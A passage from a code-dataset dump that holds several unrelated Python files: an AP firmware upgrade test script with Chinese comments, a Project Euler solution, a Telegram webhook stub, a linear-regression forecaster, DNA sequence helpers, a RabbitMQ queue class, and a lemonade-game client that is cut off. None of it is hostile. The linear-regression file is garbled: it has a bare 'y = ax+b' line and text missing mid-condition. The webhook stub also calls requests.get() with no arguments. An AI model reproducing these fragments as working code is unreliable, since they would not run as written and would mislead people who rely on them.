Progress和Requested,\n# 管理AC上可以使用wireless ap download abort命令终止AP Image更新进程,\n# 之后管理AC上可以wireless ap download start 重新触发手动独立升级所有ap,\n# ap重启后被AC管理,image版本已经更新成功。\n#*******************************************************************************\n# Change log:\n# - created by zhangjxp 2018.3.30\n#*******************************************************************************\n\n#Package\n\n#Global Definition\n\n#Source files\n\n#Procedure Definition \n\n#Functional Code\n\ntestname = 'apconfiguration_2.2.2.14'\navoiderror(testname)\nprintTimer(testname,'Start','set ap download group-size 1,\\n \\\n abort ap download when ap1 is in Code Transfer In Progress status and ap2 is in Requested status,\\n \\\n ap upgrading is aborted')\n\n###############################################################################\n#Step 1\n#操作\n# 在AC1上为AP1_image_type指定image文件为ap1_standby_build,\n# 在AC1上为AP2_image_type指定image文件为ap2_standby_build,\n# AC1设置每组同时下载image的AP数目为1\n# wireless ap download group-size 1\n# AC1上升级所有管理AP\n# 当一个AP处于Code Transfer In Progress状态,另一个AP处于Requested状态时,\n# AC终止AP升级\n# 预期\n# AP1,Ap2升级失败\n################################################################################\nprintStep(testname,'Step 1',\n 'config ap1_image_type upgrade to ap1_standby_build',\n 'config ap2_image_type upgrade to ap2_standby_build',\n 'wireless ap download group-size 1',\n 'upgrade all aps',\n 'abort ap download when ap1 is in Code Transfer In Progress status and ap2 is in Requested status',\n 'ap1 and ap2 upgrading is aborted')\nres1=res2=1\n#operate\n# 查看AP1和AP2当前的版本号\nap1_version = Get_ap_version(ap1, Ap1cmdtype)\nap2_version = Get_ap_version(ap2, Ap2cmdtype)\n\n# 为防止AP下载image速率过快,捕捉不到预期的状态,对S3端口进行限速,限制AP下载速率\nEnterInterfaceMode(switch3, s3p6)\nSetCmd(switch3, 'bandwidth control 3008')\n\n# 在AC1上为AP1和AP2指定image文件,设置ap download group-size\n# (脚本中先配置AP2再配置AP1,目的是如果AP2和AP1的image type相同时,AP2的配置会被AP1覆盖)\nEnterWirelessMode(switch1)\nSetCmd(switch1, 'wireless ap download image-type',ap2_image_type, ap2_ftpupgrade_standby_path)\nSetCmd(switch1, 'wireless ap download image-type',ap1_image_type, ap1_ftpupgrade_standby_path)\nSetCmd(switch1, 'wireless ap download group-size 1')\n\n# 升级所有管理AP\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download start')\nIdleAfter(1)\n\n# 检查一个AP处于Code Transfer In Progress状态,另一个AP处于Requested状态\nres1 = CheckSutCmd(switch1,'show wireless ap download', \n check=[('Code Transfer In Progress'),('Requested')],\n retry=10,interval=5,waitflag=False,IC=True)\n \n# 终止AP升级\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download abort')\n\n# 检查AP升级处于Aborted状态\nres2 = CheckSutCmd(switch1,'show wireless ap download', \n check=[('Download Status','Aborted'),(ap1mac, 'Aborted'),(ap2mac, 'Aborted')],\n retry=5,interval=5,waitflag=False,IC=True)\n \n# 取消S3端口限速\nEnterInterfaceMode(switch3, s3p6)\nSetCmd(switch3, 'no bandwidth control')\n \n# 检查AC1仍然管理AP1和AP2\nres3=CheckSutCmd(switch1,'show wireless ap status', \n check=[(ap1mac,'Managed','Success'),(ap2mac,'Managed','Success')],\n retry=20,interval=5,waitflag=False,IC=True) \n \n# 检查AP1和Ap2版本没有变化\nres4 = check_apversion_after_upgrade(ap1, Ap1cmdtype, ap1_version)\nres5 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap2_version)\n\n#result\nprintCheckStep(testname, 'Step 1',res1,res2,res3,res4,res5)\n###############################################################################\n#Step 2\n#操作\n# AC1上升级所有管理AP\n# 预期\n# AP1,AP2升级成功\n################################################################################\nprintStep(testname,'Step 2',\n 'upgrade all aps',\n 'ap1 and ap2 upgrade successfully',)\nres1=res2=1\n#operate\n# 升级所有管理AP\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download start')\n\n# 等待升级完成\nIdleAfter(ftp_ap_upgrade_time)\nac_wait_download_finish(switch1)\n\n# check\n# 检查AC1是否重新管理AP1和AP2\nres1=CheckSutCmd(switch1,'show wireless ap status', \n check=[(ap1mac,'Managed','Success'),(ap2mac,'Managed','Success')],\n retry=20,interval=5,waitflag=False,IC=True)\n# 检查AP1和AP2升级成功\nApLogin(ap1)\nApLogin(ap2)\nres2 = check_apversion_after_upgrade(ap1, Ap1cmdtype, ap1_standby_buildnum)\nif ap1_image_type != ap2_image_type:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap2_standby_buildnum)\nelse:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap1_standby_buildnum)\n#result\nprintCheckStep(testname, 'Step 2',res1,res2,res3)\n###############################################################################\n#Step 3\n#操作\n# 在AC1上为AP1_image_type指定image文件为ap1_current_build,\n# 在AC1上为AP2_image_type指定image文件为ap2_current_build,\n# AC1上升级所有管理AP\n# 预期\n# AP1,AP2升级成功\n################################################################################\nprintStep(testname,'Step 3',\n 'config ap1_image_type upgrade to ap1_current_build',\n 'config ap2_image_type upgrade to ap2_current_build',\n 'upgrade all aps',\n 'ap1 and ap2 upgrade successfully',)\n\n#operate\nEnterWirelessMode(switch1)\nSetCmd(switch1, 'wireless ap download image-type',ap2_image_type, ap2_ftpupgrade_current_path)\nSetCmd(switch1, 'wireless ap download image-type',ap1_image_type, ap1_ftpupgrade_current_path)\n# 升级所有管理AP\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download start')\n# 等待升级完成\nIdleAfter(ftp_ap_upgrade_time)\nac_wait_download_finish(switch1)\n# check\nres1 = CheckSutCmd(switch1,'show wireless ap status', \n check=[(ap1mac,'Managed','Success'),(ap2mac,'Managed','Success')],\n retry=20,interval=5,waitflag=False,IC=True)\nApLogin(ap1)\nApLogin(ap2)\nres2 = check_apversion_after_upgrade(ap1, Ap1cmdtype, ap1_current_buildnum)\nif ap1_image_type != ap2_image_type:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap2_current_buildnum)\nelse:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap1_current_buildnum)\n#result\nprintCheckStep(testname, 'Step 3',res1,res2,res3)\n################################################################################\n# Step 4\n# 操作\n# 恢复默认配置\n################################################################################\nprintStep(testname, 'Step 4',\n 'Recover initial config')\n \n# operate\nEnterWirelessMode(switch1)\nSetCmd(switch1, 'wireless ap download group-size 10')\nSetCmd(switch1, 'no wireless ap download image-type',ap1_image_type)\nSetCmd(switch1, 'no wireless ap download image-type',ap2_image_type)\n#end\nprintTimer(testname, 'End')","sub_path":"autoTests/module/apconfiguration/apconfiguration_2.2.2.14_ONE.py","file_name":"apconfiguration_2.2.2.14_ONE.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"597646250","text":"\"\"\"\nНачиная с числа 1 и двигаясь дальше вправо по часовой\nстрелке, образуется следующая спираль 5 на 5:\n\n21 22 23 24 25\n20 7 8 9 10\n19 6 1 2 11\n18 5 4 3 12\n17 16 15 14 13\n\nМожно убедиться, что сумма чисел в диагоналях равна 101.\nКакова сумма чисел в диагоналях спирали 1001 на 1001,\nобразованной таким же способом?\n\"\"\"\nnum, step = 1, 0\nres = set()\nres.add(num)\n\nwhile len(res) < 2001:\n step += 2\n for reply in range(4):\n num += step\n res.add(num)\n\nprint(sum(res))\n","sub_path":"euler028.py","file_name":"euler028.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"183012636","text":" ##WEBHOOK\n\nfrom flask import Flask, request \nimport os\nfrom pprint import pprint as pp\nimport requests\n\napp= Flask(__name__)\n\ntoken = os.getenv('TELEGRAM_TOKEN')\nbase_url = \"https://api.hphk.io/telegram\"\nmy_url= \"https://webhook-soowon.c9users.io\" #c9주소 \n\n # 웹훅을 통해 정보가 들어올 route\n@app.route('/{}'.format(token), methods=['POST'])\ndef telegram(): \n doc = request.get_json()\n pp(doc)\n #어떤메세지가 들어오던 '닥쳐'라고 하는 챗봇\n chat_id = doc[\"message\"][\"chat\"][\"id\"]\n msg= doc[\"message\"][\"text\"]\n #url = \"{}/bot{}/sendMesage?chat_id={}&text={}\".format(base_url,token,chat_id,msg)\n requests.get()\n return '',200 \n\n #웹훅 설정(set webhook) == 텔레그램에게 알리미를 해달라고 하는 것\n@app.route('/setwebhook')\ndef setwebhook(): \n url = \"{}/bot{}/setwebhook?url={}/{}\".format(base_url, token, my_url, token)\n res = requests.get(url)\n return '{}'.format(res), 200 #200 : status code \n\n # 텔레그램이 우리에게 알림을 줄때 사용할 route\n # 만약 특정 유저가 우리 봇으로 메세지를 보내게 되면, \n # 텔레그램이 우리에게 알림을 보내온다.(json)\n\n#@app.route()","sub_path":"WEB/webhook/project/app.1.py","file_name":"app.1.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"587142832","text":"# coding=utf-8\n\n# 线性回归预测时间序列的累计数量\ny = ax+b\n\nimport random\nfrom matrix import Matrix\nimport time\n# 线性回归\ndef linear_regression(data, flavor_list):\n raw = Matrix(data)\n alpha = 0.12\n ntheta = 5\n thetas = []\n remains = []\n for index in range(len(flavor_list)):\n n = int(flavor_list[index].name.split('flavor')[1])\n print('linear regression for flavor%s' % n)\n theta = []\n for i in range(ntheta+1):\n theta.append(random.uniform(0,1))\n theta = Matrix(theta)\n theta.transposition()\n X = []\n for i in range(ntheta, len(data)):\n xline = raw.get_col(n)[i - ntheta:i]\n xline.append(1)\n X.append(xline)\n X = Matrix(X)\n Y = Matrix(raw.get_col(n)[ntheta:])\n Y.transposition()\n # 把最后一组数据存入\n remains.append(xline)\n thetas.append(gradient(X, Y, theta, alpha))\n return thetas, remains\n\n\n# 梯度下降\ndef gradient(X, Y, theta, alpha):\n count = X.rows()\n n = theta.rows()\n lastJ = 0\n for i in range(200):\n temptheta = theta\n for j in range(n):\n MUL = X * temptheta\n SUB = MUL - Y\n SX = Matrix(X.get_col(j))\n SX.transposition()\n Z = SUB.dotmul(SX)\n SUM = 0\n for i in range(Z.rows()):\n SUM = SUM + Z.get_row(i)[0]\n theta.matrix[j][0] = theta.matrix[j][0] - alpha/count*SUM\n J = cost(X,Y,theta)\n if lastJ!=0 and lastJ20:\n # final.append(20)\n # else:\n final.append(sum(n))\n return final","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"429465854","text":"from codeGenetique import codeGenetique\nimport sys\nimport os.path\n\n\ndef pourcentage(seq): # 6.1 --> DONE\n percent = 100.0 / len(seq)\n nA = float(seq.count(\"A\")) * percent\n print ('A = ' + str(nA) + ' %')\n nC = float(seq.count(\"C\")) * percent\n print ('C = ' + str(nC) + ' %')\n nG = float(seq.count(\"G\")) * percent\n print ('G = ' + str(nG) + ' %')\n nT = float(seq.count(\"T\")) * percent\n print ('T = ' + str(nT) + ' %\\n')\n\n\ndef nombreCG(seq): # 6.2 --> DONE\n nombre = float(seq.count(\"CG\"))\n nCG = (nombre / len(seq))\n return [nombre, round(nCG, 1)]\n\n\ndef listeCodons(seq): # 6.3 --> DONE\n result = []\n for i in range(0, len(seq), 3):\n codon = seq[i:i + 3]\n if (len(codon) % 3 != 0):\n break\n result.append(seq[i:i + 3])\n return result\n\n\ndef orf_aux(seq): # 6.4 AUX\n result = []\n start = 'ATG'\n stop = ['TAA', 'TAG', 'TGA']\n begin = False\n for i in range(0, len(seq), 3):\n codon = seq[i:i + 3]\n if (len(codon) % 3 != 0):\n break\n if codon == start and begin is False:\n begin = True\n if not begin:\n continue\n result.append(codon)\n if codon in stop:\n break\n return result\n\n\ndef orfs(seq): # 6.4 --> DONE\n cds = []\n seqs = [seq, complementaire(seq)]\n for s in seqs:\n # print(\"This is the sequence: \" + s)\n for i in range(0, 3):\n # print (\"i = \" + str(i))\n seq_aux = seq[i:len(seq)]\n result = orf_aux(seq_aux)\n # print (\"Result = \", result[0:-1])\n cds.append(result[:])\n return cds\n\n\ndef complementaire(seq): # 6.5 --> DONE\n dic = {\n 'A': 'T',\n 'T': 'A',\n 'C': 'G',\n 'G': 'C'\n }\n result = ''\n for i in seq:\n result += dic[i]\n return result\n\n\ndef traduction(gene): # 6.6 --> DONE\n result = []\n i = 0\n while (i < len(gene)):\n codon = gene[i:i + 3]\n if (len(codon) % 3 != 0):\n break\n result.append(codeGenetique[codon])\n i += 3\n return result\n\n\ndef pourcentageFichier(fichier): # 7.1 --> DONE\n data = newOrder(fichier)\n pourcentage(data)\n\n\ndef newOrder(fichier): # 7.1 AUX\n f = open(fichier, 'r')\n rawData = ''\n for line in f:\n if line.startswith(\">\"):\n continue\n rawData += line\n data = rawData.replace('\\n', '')\n return data\n\n\ndef genes(fichier1, fichier2): # 7.2 --> DONE\n f1 = open(fichier1, 'r')\n genome = newOrder(fichier2)\n next(f1)\n nouveauFichier = 'fasta_' + os.path.basename(fichier1)[0:-4] + '.txt'\n fasta = open(nouveauFichier, 'a+')\n for line in f1:\n replicon = line.split(\"\\t\")[2]\n accesion = line.split(\"\\t\")[3]\n orientation = line.split(\"\\t\")[4]\n identifiant = line.split(\"\\t\")[5]\n data = genome[int(replicon) - 1:int(accesion) - 3]\n if orientation == '-':\n data = data[::-1]\n # Faut chercher ATG?\n # data = orf_aux(data)\n data = ''.join(data)\n # Maintenant on fait le fichier avec format ASTA\n if len(data) != 0:\n fasta.write(\">\" + identifiant + \"\\n\")\n fasta.write(data + \"\\n\")\n fasta.close()\n return nouveauFichier\n\n\ndef pourcentageFASTA(fichier): # 7.3 --> DONE\n f = open(fichier, 'r')\n id = ''\n for line in f:\n if line.startswith(\">\"):\n id += line\n continue\n print(id)\n pourcentage(line)\n id = ''\n\n\ndef writeToFile(fichier, trad, id): # Aux\n nouveauFichier = fichier.replace('fasta', 'fastaProteines')\n f = open(nouveauFichier, 'a+')\n f.write(id + \"\\n\")\n for item in trad:\n f.write(item)\n f.write(\"\\n\\n\")\n return nouveauFichier\n\n\ndef traductionGenes(fichier): # 7.4 --> DONE\n f = open(fichier, 'r')\n id = ''\n for line in f:\n if line.startswith(\">\"):\n id = line\n continue\n trad = traduction(line[0:len(line) - 1])\n nouveauFichier = writeToFile(fichier, trad, id)\n id = ''\n return nouveauFichier\n\n\ndef tailleMoyenne(fichier): # 7.5 --> DONE\n f = open(fichier, 'r')\n proteinCounter = 0\n acc = 0\n for line in f:\n if line.startswith(\">\"):\n proteinCounter += 1\n continue\n # line = line[0:len(line) - 1]\n acc += len(line[0:len(line) - 1])\n taille = acc / proteinCounter\n print(\"Taille moyenne des proteines: \" + str(taille))\n\n\ndef pourcentageCodante(fichier, total): # 7.6 --> DONE\n data = newOrder(fichier)\n percentage = len(data) / float(total)\n return str(percentage * 100) + ' %'\n\n\ndef main():\n if sys.argv[1] == \"-h\" or sys.argv[1] == \"--help\":\n print ('Usage:')\n print ('\\t[1] python ' + sys.argv[0] + ' proteines PATH_TO_TAB_FILE PATH_TO_GENOME')\n print ('\\t[2] python ' + sys.argv[0] + ' codantePercent PATH_TO_FASTA_GENES_FILE TOTAL_NUCLEOTIDES')\n print ('\\t[3] python ' + sys.argv[0] + ' pourcentageGenes PATH_TO_FASTA_GENES')\n elif (sys.argv[1] == \"proteines\"):\n # Creation d'un fichier au format fasta avec les genes d'un genome\n print('Extraction des genes a partir d\\'un genome')\n fastaGenes = genes(sys.argv[2], sys.argv[3])\n print('Nouveau fichier: ' + fastaGenes)\n # Creation d'un fichier avec les proteines des diferents fichiers\n print('Traduction des genes a proteines')\n fastaProteines = traductionGenes(fastaGenes)\n print('Nouveau fichier: ' + fastaProteines)\n tailleMoyenne(sys.argv[2])\n elif (sys.argv[1] == 'codantePercent'):\n percentage = pourcentageCodante(sys.argv[2], sys.argv[3])\n print('Pourcentage de la region codante pour le fichier: ')\n print ('\\t' + sys.argv[2] + ' = ' + percentage)\n elif (sys.argv[1] == 'pourcentageGenes'):\n pourcentageFichier(sys.argv[2])\n else:\n print('Please, give me a valid option')\n\n\nmain()\n","sub_path":"TMEs/fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"149001416","text":"\"\"\"\nThe rabbitpy.queue module contains two classes :py:class:`Queue` and\n:py:class:`Consumer`. The :py:class:`Queue` class is an object that is used\ncreate and work with queues on a RabbitMQ server. The :py:class:`Consumer`\ncontains a generator method, :py:meth:`next_message `\nwhich returns messages delivered by RabbitMQ. The :py:class:`Consumer` class\nshould not be invoked directly, but rather by the\n:py:meth:`Queue.consumer() ` method::\n\n with conn.channel() as channel:\n queue = rabbitpy.Queue(channel, 'example')\n for message in queue.consume_messages():\n print 'Message: %r' % message\n message.ack()\n\n\"\"\"\nimport contextlib\nimport logging\nfrom pamqp import specification\n\nfrom rabbitpy import base\nfrom rabbitpy import utils\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Queue(base.AMQPClass):\n \"\"\"Create and manage RabbitMQ queues.\n\n :param channel: The channel object to communicate on\n :type channel: :py:class:`rabbitpy.channel.Channel`\n :param str name: The name of the queue\n :param exclusive: Queue can only be used by this channel and will\n auto-delete once the channel is closed.\n :type exclusive: bool\n :param durable: Indicates if the queue should survive a RabbitMQ is restart\n :type durable: bool\n :param bool auto_delete: Automatically delete when all consumers disconnect\n :param int max_length: Maximum queue length\n :param int message_ttl: Time-to-live of a message in milliseconds\n :param expires: Milliseconds until a queue is removed after becoming idle\n :type expires: int\n :param dead_letter_exchange: Dead letter exchange for rejected messages\n :type dead_letter_exchange: str\n :param dead_letter_routing_key: Routing key for dead lettered messages\n :type dead_letter_routing_key: str\n :param dict arguments: Custom arguments for the queue\n\n \"\"\"\n def __init__(self, channel, name='',\n durable=True, exclusive=False, auto_delete=False,\n max_length=None, message_ttl=None, expires=None,\n dead_letter_exchange=None, dead_letter_routing_key=None,\n arguments=None):\n super(Queue, self).__init__(channel, name)\n\n # Validate Arguments\n for var, vname in [(auto_delete, 'auto_delete'), (durable, 'durable'),\n (exclusive, 'exclusive')]:\n if not isinstance(var, bool):\n raise ValueError('%s must be True or False' % vname)\n\n for var, vname in [(max_length, 'max_length'),\n (message_ttl, 'message_ttl'), (expires, 'expires')]:\n if var and not isinstance(var, int):\n raise ValueError('%s must be an int' % vname)\n\n for var, vname in [(dead_letter_exchange,\n 'dead_letter_exchange'),\n (dead_letter_routing_key,\n 'dead_letter_routing_key')]:\n if var and not utils.is_string(var):\n raise ValueError('%s must be a str, bytes or unicode' % vname)\n\n if arguments and not isinstance(arguments, dict()):\n raise ValueError('arguments must be a dict')\n\n # Defaults\n self.consumer_tag = 'rabbitpy.%i.%s' % (self.channel.id, id(self))\n self.consuming = False\n\n # Assign Arguments\n self._durable = durable\n self._exclusive = exclusive\n self._auto_delete = auto_delete\n self._arguments = arguments or {}\n self._max_length = max_length\n self._message_ttl = message_ttl\n self._expires = expires\n self._dlx = dead_letter_exchange\n self._dlr = dead_letter_routing_key\n\n def __len__(self):\n \"\"\"Return the pending number of messages in the queue by doing a passive\n Queue declare.\n\n :rtype: int\n\n \"\"\"\n response = self._rpc(self._declare(True))\n return response.message_count\n\n def bind(self, source, routing_key=None, arguments=None):\n \"\"\"Bind the queue to the specified exchange or routing key.\n\n :type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange\n :param source: The exchange to bind to\n :param str routing_key: The routing key to use\n :param dict arguments: Optional arguments for for RabbitMQ\n :return: bool\n\n \"\"\"\n if hasattr(source, 'name'):\n source = source.name\n frame = specification.Queue.Bind(queue=self.name,\n exchange=source,\n routing_key=routing_key or '',\n arguments=arguments)\n response = self._rpc(frame)\n return isinstance(response, specification.Queue.BindOk)\n\n @contextlib.contextmanager\n def consumer(self, no_ack=False, prefetch=100, priority=None):\n \"\"\"Consumer message context manager, returns a consumer message\n generator.\n\n :param bool no_ack: Do not require acknowledgements\n :param int prefetch: Set a prefetch count for the channel\n :param int priority: Consumer priority\n :rtype: :py:class:`Consumer `\n\n \"\"\"\n if prefetch is not None:\n self.channel.prefetch_count(prefetch)\n self.channel._consume(self, no_ack, priority)\n self.consuming = True\n yield Consumer(self)\n\n def consume_messages(self, no_ack=False, prefetch=100, priority=None):\n \"\"\"Consume messages from the queue as a generator:\n\n ```\n for message in queue.consume_messages():\n message.ack()\n ```\n\n :param bool no_ack: Do not require acknowledgements\n :param int prefetch: Set a prefetch count for the channel\n :param int priority: Consumer priority\n :rtype: :py:class:`Iterator`\n\n \"\"\"\n with self.consumer(no_ack, prefetch, priority) as consumer:\n for message in consumer.next_message():\n yield message\n\n def declare(self, passive=False):\n \"\"\"Declare the queue on the RabbitMQ channel passed into the\n constructor, returning the current message count for the queue and\n its consumer count as a tuple.\n\n :param bool passive: Passive declare to retrieve message count and\n consumer count information\n :return: Message count, Consumer count\n :rtype: tuple(int, int)\n\n \"\"\"\n response = self._rpc(self._declare(passive))\n return response.message_count, response.consumer_count\n\n def delete(self, if_unused=False, if_empty=False):\n \"\"\"Delete the queue\n\n :param bool if_unused: Delete only if unused\n :param bool if_empty: Delete only if empty\n\n \"\"\"\n self._rpc(specification.Queue.Delete(queue=self.name,\n if_unused=if_unused,\n if_empty=if_empty))\n\n def get(self, acknowledge=True):\n \"\"\"Request a single message from RabbitMQ using the Basic.Get AMQP\n command.\n\n :param bool acknowledge: Let RabbitMQ know if you will manually\n acknowledge or negatively acknowledge the\n message after each get.\n :rtype: rabbitpy.message.Message or None\n\n \"\"\"\n self._write_frame(specification.Basic.Get(queue=self.name,\n no_ack=not acknowledge))\n return self.channel._get_message()\n\n def ha_declare(self, nodes=None):\n \"\"\"Declare a the queue as highly available, passing in a list of nodes\n the queue should live on. If no nodes are passed, the queue will be\n declared across all nodes in the cluster.\n\n :param list nodes: A list of nodes to declare. If left empty, queue\n will be declared on all cluster nodes.\n :return: Message count, Consumer count\n :rtype: tuple(int, int)\n\n \"\"\"\n if nodes:\n self._arguments['x-ha-policy'] = 'nodes'\n self._arguments['x-ha-nodes'] = nodes\n else:\n self._arguments['x-ha-policy'] = 'all'\n if 'x-ha-nodes' in self._arguments:\n del self._arguments['x-ha-nodes']\n return self.declare()\n\n def purge(self):\n \"\"\"Purge the queue of all of its messages.\"\"\"\n self._rpc(specification.Queue.Purge())\n\n def unbind(self, source, routing_key=None):\n \"\"\"Unbind queue from the specified exchange where it is bound the\n routing key. If routing key is None, use the queue name.\n\n :type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange\n :param source: The exchange to unbind from\n :param str routing_key: The routing key that binds them\n\n \"\"\"\n if hasattr(source, 'name'):\n source = source.name\n self._rpc(specification.Queue.Bind(queue=self.name,\n exchange=source,\n routing_key=routing_key or\n self.name))\n\n def _declare(self, passive=False):\n \"\"\"Return a specification.Queue.Declare class pre-composed for the rpc\n method since this can be called multiple times.\n\n :param bool passive: Passive declare to retrieve message count and\n consumer count information\n :rtype: pamqp.specification.Queue.Declare\n\n \"\"\"\n arguments = dict(self._arguments)\n if self._expires:\n arguments['x-expires'] = self._expires\n if self._message_ttl:\n arguments['x-message-ttl'] = self._message_ttl\n if self._max_length:\n arguments['x-max-length'] = self._max_length\n if self._dlx:\n arguments['x-dead-letter-exchange'] = self._dlx\n if self._dlr:\n arguments['x-dead-letter-routing-key'] = self._dlr\n return specification.Queue.Declare(queue=self.name,\n durable=self._durable,\n passive=passive,\n exclusive=self._exclusive,\n auto_delete=self._auto_delete,\n arguments=arguments)\n\n\nclass Consumer(object):\n \"\"\"The Consumer class implements an interator that will retrieve the next\n message from the stack of messages RabbitMQ has delivered until the client\n exists the iterator. It should be used with the\n :py:meth:`Queue.consumer() ` method which\n returns a context manager for consuming.\n\n \"\"\"\n def __init__(self, queue):\n self.queue = queue\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"Called when exiting the consumer iterator\n\n \"\"\"\n self.queue.channel.rpc(self._basic_cancel)\n self.queue.consuming = False\n\n @property\n def _basic_cancel(self):\n return specification.Basic.Cancel(consumer_tag=self.queue.consumer_tag)\n\n def next_message(self):\n \"\"\"Retrieve the nest message from the queue as an iterator, blocking\n until the next message is available.\n\n :rtype: :py:class:`rabbitpy.message.Message`\n\n \"\"\"\n while self.queue.consuming:\n yield self.queue.channel._consume_message()\n","sub_path":"rabbitpy/amqp_queue.py","file_name":"amqp_queue.py","file_ext":"py","file_size_in_byte":11557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"111662191","text":"import os, re\n\n__author__ = 'jonathan'\n\ndef get_ignore_list(file_name):\n data = []\n with open(file_name, 'r') as reader:\n for line in reader:\n row = [item.strip() for item in line.strip().split(',')]\n data.append(row)\n\n return data\n\ndef clear_beginning_zero(string):\n return re.sub('^[0]+', '', string)\n\ndef retrieve_data_from_csv(file_names, bus_service_id, ignore_list):\n data = []\n for file_name in file_names:\n with open(file_name, 'r') as reader:\n for line in reader:\n row = [item.strip() for item in line.strip().split(',')]\n #bus service id process\n row[0] = clear_beginning_zero(row[0])\n if bus_service_id.endswith('all'):\n if [row[0], row[1]] not in ignore_list:\n data.append(row)\n elif row[0] == bus_service_id:\n data.append(row)\n return data\n\ndef export_sql(sql, bus_service_id, sql_export_path):\n sql_file_name = '%s/%s.sql' % (sql_export_path, bus_service_id)\n dir = os.path.dirname(sql_file_name)\n if not os.path.exists(dir):\n os.makedirs(dir)\n fw = open(sql_file_name, 'w')\n fw.write(sql)\n fw.close()\n print('%s has been generated.' % sql_file_name)\n\ndef main():\n print(retrieve_data_from_csv('//192.168.152.135/share/PTP2/_SERVICE REQUESTS/VT293-SR-PTP-20121218-0134/file from user/CSV File/SBST Route (16Dec12).CSV', '50'))\n\nif __name__ == '__main__':\n main()","sub_path":"bus_update/common/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"441629170","text":"import requests\nimport json\n\n# Basic variables, shouldn't change much\nisDebug = False\n\nsignCost = 15\nlemonadeCost = 2\nassets = 200\n\nbaseurl = \"http://localhost:51727/Game/\" # CHANGE WHEN DEPLOYED\nheaders = {'Content-Type': 'application/json'}\n\ndayInfo = {}\nresults = {}\n\n# DEBUG PRINTS\n# if isSending is True, will say that it is data to be sent.\ndef printData(data,isSending=False):\n\tglobal isDebug\n\tif not isDebug:\n\t\treturn\n\n\tprint(\"\")\n\tprint(\"--------\")\n\tprint(\"\")\n\n\tif isSending:\n\t\tmsg = \"HTTP: Data to be sent: {0}\"\n\telse:\n\t\tmsg = \"HTTP: Data received: {0}\"\n\t\t\n\tprint(msg.format(data))\n# } end printData\n\n\n\n# Not called by outside program: Validates that a set of choices is correct.\ndef validateChoices(choices):\n\tglobal assets, lemonadeCost, signCost, baseurl, headers\n\tif int(choices[0]['Price']) > 100:\n\t\treturn \"Lemonade for more than a dollar? That's highway robbery.\"\n\n\tif int(choices[0]['Price']) < 0:\n\t\treturn \"You can't give away money with the lemonade!\"\n\n\tglasses = int(choices[0]['Glasses'])\n\tsigns = int(choices[0]['Signs'])\n\n\tif glasses < 0 or signs < 0:\n\t\treturn \"You can't make negative amounts of signs or glasses in the real world.\"\n\n\tif glasses * lemonadeCost + signs * signCost > assets:\n\t\tpossibleGlasses = (assets - signs * signCost) // lemonadeCost\n\t\tif possibleGlasses <= 0:\n\t\t\treturn \"You don't have enough money for that, you've got too many signs.\"\n\t\telse:\n\t\t\treturn f\"You don't have enough money for that. Maybe try {possibleGlasses} glasses of lemonade and {signs} signs?\"\n\n\treturn \"G\"\n\n\n# Tell the amount of money available.\ndef printAssets():\n\tglobal assets\n\treturn f\"You have {assets}¢ available.\"\n\n\n\n\n# DAY START ===================================\ndef startNextDay(gameId):\n\tglobal baseurl, headers, dayInfo\n\t# get next day information\n\turl = baseurl + \"NextDay\"\n\tdata = {}\n\tdata['Id'] = gameId\n\tdata = json.dumps(data);\n\n\tr = requests.post(url, headers=headers, data=data)\n\n\tdayInfo = {\n\t\t'DayNumber': r.json()['Number'],\n\t\t'Weather': r.json()['Weather']['Name'],\n\t\t'Event': r.json()['ForecastMessage'],\n\t\t'LemonadeCost': r.json()['LemonadeCost']\n\t}\n\ndef printDayOverview():\n\treturn printDayNumber() + \"\\n\" + printCostToMake() + \"\\n\" + printWeather() + \"\\n\" + printEvent()\n\ndef printWeather():\n\treturn f\"The weather today is {dayInfo['Weather']}.\"\n\ndef printEvent():\n\tif dayInfo['Event'] == \"\":\n\t\treturn \"Today will be a normal day.\"\n\telse:\n\t\treturn dayInfo['Event']\n\ndef printCostToMake():\n\tglobal lemonadeCost\n\treturn f\"It costs {lemonadeCost}¢ to make one cup of lemonade.\"\n\ndef printCostSign():\n\tglobal signCost\n\treturn f\"It costs {signCost}¢ to make one advertising sign.\"\n\ndef printDayNumber():\n\treturn f\"It is day {dayInfo['DayNumber']}.\"\n\n\n# DAY END ================================\ndef finishDay(choices, gameId):\n\tglobal assets, lemonadeCost, signCost, baseurl, headers, results\n\t# send post request to finish day\n\tdata = {}\n\tdata['Choices'] = choices\n\tdata['Id'] = gameId\n\tdata = json.dumps(data)\n\n\turl = baseurl + \"FinishDay\"\n\tr = requests.post(url, headers=headers, data=data)\n\n\tresults = {\n\t\t'ResultMessage': r.json()['ResultMessage'],\n\t\t'EventName': r.json()['EventName'],\n\t\t'GlassesSold': r.json()['Results'][0]['GlassesSold'],\t\t# return json is an array of result objects\n\t\t'Revenue': r.json()['Results'][0]['Revenue'],\t\t\t\t# because of 